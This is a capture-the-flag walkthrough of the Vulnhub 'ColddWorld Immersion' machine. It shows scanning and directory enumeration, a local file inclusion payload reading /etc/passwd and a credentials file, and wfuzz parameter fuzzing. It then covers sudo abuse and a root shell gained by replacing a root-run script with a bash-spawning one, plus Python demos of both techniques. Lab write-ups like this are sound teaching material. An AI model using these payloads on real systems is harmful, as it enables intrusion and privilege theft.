Welcome to ColddWorld Immersion Walkthrough – Vulnhub – Writeup. The machine is an easy boot-to-root challenge.
Link to the machine: https://www.vulnhub.com/entry/colddworld-immersion,668/
Identify the target
Firstly, I had to identify the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Now that I have identified the IP address of the target, I can scan for open ports to identify exposed services.
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.12 -oN immersion.nmap
From the screenshot above, we can see that HTTP and SSH are available, but SSH listens on port 3042 instead of the usual 22. Since I had no credentials yet, I started by enumerating the web server.
Enumerate web server
gobuster dir -u http://10.0.2.12 -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I checked every discovered path, and /login turned out to be the interesting one.
Clicking the login link redirected me to /accounts.php. The source of the login page suggested that it might have a Local File Inclusion (LFI) vulnerability.
An HTML comment mentions a credentials file, carls.txt, in the directory /var, and the same comment quotes 'page', which hints at the name of the GET parameter that is vulnerable to LFI. So I tried the inclusion as follows.
Because the browser collapses the newlines of the included file (only <br> tags render as line breaks), view the page source to read the output properly.
If I had not had the hint for the GET parameter, I would have had to fuzz for it. There are many tools for this; I prefer wfuzz. wfuzz substitutes each word of the wordlist for the FUZZ keyword in the request. First run it without any filter, so you can see what a non-matching response looks like, then add a filter to hide those responses.
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd'
As you can see above, the responses for the tried names have 0 characters, so those are not the parameter we are looking for. We can hide those results with --hh 0 (hide responses with that character count).
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd' --hh 0
As seen above, the parameter "page" produced a different response. That is how you identify the parameter when there are no hints; in this case, the HTML comment had already given it away.
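To make the fuzzing idea above (and the "view the source because of the <br> tags" point) concrete without a live target, here is an added example that is not part of the original write-up. It uses a constructed in-memory file system and a Python function standing in for the vulnerable account.php (the real page is PHP; the document root /var/www/html/login, the page names and the mini wordlist are assumptions). It goes a step beyond wfuzz --hh 0: the filter is keyed on a baseline response obtained with a random parameter name, and each hit also records whether the /etc/passwd marker actually came back, which separates "the parameter exists" from "the inclusion worked". A hardened handler that maps the parameter to an allowlist is fuzzed alongside it for contrast.

```python
import posixpath
import secrets

# Constructed stand-in file system for the demo (not the real target): only these paths "exist".
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "carls:x:1000:1000::/home/carls:/bin/bash\n"
    ),
    "/var/carls.txt": "user: carls\npassword: Y2FybG9z\n",
    "/var/www/html/login/home.html": "<p>Welcome to the account area.</p>",
}
WEB_ROOT = "/var/www/html/login"          # assumed document root of account.php
TEMPLATE = '<html><body><a href="accounts.php">Login</a>{}</body></html>'
TRAVERSAL = "../../../../../etc/passwd"   # same payload the write-up uses
MARKER = "root:x:0:0"                     # proves /etc/passwd really came back
# Constructed mini wordlist standing in for SecLists common.txt.
WORDLIST = ["id", "user", "file", "page", "include", "lang", "view", "template"]


def vulnerable_account_page(params):
    """Mimics the vulnerable account.php: include($_GET['page']) with no validation."""
    page = params.get("page")
    if page is None:
        return TEMPLATE.format("")
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    body = FAKE_FS.get(resolved, "")  # PHP would print a warning for a missing file; simplified
    return TEMPLATE.format(body.replace("\n", "<br>"))


def safe_account_page(params):
    """Hardened form: the parameter selects an allowlist entry, never a path."""
    allowed = {"home": WEB_ROOT + "/home.html"}
    page = params.get("page", "home")
    if page not in allowed:
        return TEMPLATE.format("Unknown page")
    return TEMPLATE.format(FAKE_FS[allowed[page]])


def fuzz_parameters(handler, wordlist, payload=TRAVERSAL, marker=MARKER):
    """Parameter discovery the way wfuzz --hh works, but against a baseline instead of a fixed 0.

    Returns (name, response_length, marker_found) for every name whose response
    differs in length from a request made with a random, certainly-unused name.
    """
    baseline_len = len(handler({secrets.token_hex(8): payload}))
    hits = []
    for name in wordlist:
        resp = handler({name: payload})
        if len(resp) != baseline_len:
            hits.append((name, len(resp), marker in resp))
    return hits


def render_plain(html):
    """Undo the <br> joining so the included file reads like the page source view."""
    body = html.split("</a>", 1)[1].split("</body>", 1)[0]
    return body.replace("<br>", "\n")


if __name__ == "__main__":
    for label, handler in (("vulnerable", vulnerable_account_page), ("hardened", safe_account_page)):
        print(label, fuzz_parameters(handler, WORDLIST))
    print(render_plain(vulnerable_account_page({"page": TRAVERSAL})))
```

Against the vulnerable handler, "page" is the only hit and the marker is present; against the hardened one, "page" is still detected as a live parameter (its response length changes) but no file content comes back, which is the distinction a practitioner wants before spending time on a candidate.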
Now that we know the way to get file inclusions, we can use the same technique to get the carls.txt file.
The file gave me a username and a password, but they worked on neither the SSH service nor the login page. The password turned out to be base64-encoded; decoding it gave the real one.
echo Y2FybG9z | base64 -d
Then, I logged in to the SSH server.
ssh carls@10.0.2.12 -p 3042
Getting user privileges
Once inside the machine, the goal is the flags. There was no flag in the home directory of the user carls, so I checked the user's sudo permissions (sudo -l).
The output shows that carls can run /bin/bash as the user c0ldd, which is exactly what we need.
sudo -u c0ldd /bin/bash
cd /home/c0ldd
cat user.txt
cat user.txt | base64 -d && echo
Finally, we got our first flag.
Getting root’s privileges
Next is root. I checked the sudo permissions of the user c0ldd in the same way.
c0ldd can execute a Python script named "DoNotRun.py" as root, so if we control the script's contents we get a root shell. I looked at the content of the script and the permissions on it.
cat DoNotRun.py
ls -al
The script just prints a message in an infinite loop. It is owned by root and not writable by anyone else, but that does not matter: deleting a file and creating a new one requires write permission on the directory, not on the file, and the directory is c0ldd's own home. So we remove the file and create one with the same name and our own content (a plain redirect into the root-owned file would be denied, hence the rm first).
rm -f DoNotRun.py
echo 'import os;os.system("/bin/bash")' > DoNotRun.py
cat DoNotRun.py
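The permission nuance above (the file is not writable, but the directory is) is the part of this escalation that people most often get wrong, so here is an added example, not from the original write-up, that reproduces it in a throwaway directory. Python is used to stay in one language with the earlier example. Without privileges we cannot chown a file to root, so a read-only mode (0444) stands in for "owned by root, not writable by c0ldd"; the script contents and the directory are constructed.

```python
import os
import tempfile

PAYLOAD = 'import os;os.system("/bin/bash")\n'          # the write-up's replacement script
ORIGINAL = 'while True:\n    print("Do not run this")\n'  # constructed stand-in for the real DoNotRun.py
SCRIPT_NAME = "DoNotRun.py"


def setup_target(directory):
    """Create the stand-in script and make it read-only (mode 0444).

    The read-only mode plays the role of "owned by root, not writable by c0ldd"
    since an unprivileged demo cannot chown the file to root.
    """
    path = os.path.join(directory, SCRIPT_NAME)
    with open(path, "w") as f:
        f.write(ORIGINAL)
    os.chmod(path, 0o444)
    return path


def try_direct_write(path):
    """The naive `echo ... > DoNotRun.py`: needs write permission on the file itself."""
    try:
        with open(path, "w") as f:
            f.write(PAYLOAD)
        return True
    except PermissionError:
        return False


def replace_via_unlink(path):
    """The working route: unlink and recreate, which needs only write+exec on the directory."""
    os.unlink(path)
    with open(path, "w") as f:
        f.write(PAYLOAD)
    with open(path) as f:
        return f.read()


def run_demo():
    """Run both attempts in a temporary 'home directory' and report what happened."""
    with tempfile.TemporaryDirectory() as home:
        target = setup_target(home)
        result = {
            "running_as_root": getattr(os, "geteuid", lambda: -1)() == 0,
            "dir_writable": os.access(home, os.W_OK),
            "file_writable": os.access(target, os.W_OK),
            "direct_write_succeeded": try_direct_write(target),
            "content_after_replace": replace_via_unlink(target),
        }
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

Run as an ordinary user, the direct write is denied while the unlink-and-recreate path succeeds; run as root the direct write also succeeds, because root bypasses discretionary file permissions, which is why the demo reports the effective uid alongside the results.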
Finally, I ran the script with sudo, got a root shell and read the flag.
sudo python3 /home/c0ldd/DoNotRun.py
id
cd /root
ls -al
cat root.txt
cat root.txt | base64 -d && echo
This is an easy machine for a beginner to start learning about LFI and sudo abuse.